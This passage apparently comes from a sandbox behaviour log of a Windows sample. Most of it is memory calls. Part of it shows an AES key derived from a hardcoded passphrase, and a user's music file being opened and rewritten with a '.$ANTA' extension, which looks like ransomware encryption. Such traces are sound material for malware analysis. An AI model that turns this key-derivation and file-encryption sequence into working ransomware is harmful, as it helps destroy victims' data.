hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.578] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0113.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0113.579] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0113.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0113.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0113.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0113.580] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0113.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0113.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0113.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0113.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0113.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0113.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0113.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0113.580] CryptAcquireContextA (in: phProv=0x144e558, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e558*=0x41a5360) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0113.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0113.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0113.582] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0113.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0113.582] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0113.582] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0113.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0113.582] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.583] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0113.583] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0113.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cacd0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0113.583] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e2c8 | out: phHash=0x144e2c8) returned 1 [0113.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0113.583] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0113.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0113.583] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.583] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0113.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cabb0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0113.583] CryptHashData (hHash=0x41ac2c0, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0113.583] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.583] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0113.584] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0113.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caca0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0113.584] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e2c8 | out: phKey=0x144e2c8*=0x41ac540) returned 1 [0113.584] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.584] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0113.584] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0113.584] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\fKGiw.wav" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\xavp\\fkgiw.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0113.584] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.584] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea00 | out: lpNewFilePointer=0x0) returned 1 [0113.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0113.585] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0113.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0113.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0113.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0113.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0113.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0113.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0113.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0113.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431db18 [0113.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a2f0 [0113.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0113.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0113.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a0e0 [0113.586] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\xavp")) returned 0x10 [0113.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0113.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0113.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0113.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0113.586] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\fKGiw.wav.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\xavp\\fkgiw.wav.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0113.587] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0113.587] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0113.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e02020 [0113.590] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea50 | out: lpNewFilePointer=0x0) returned 1 [0113.591] ReadFile (in: hFile=0x298, 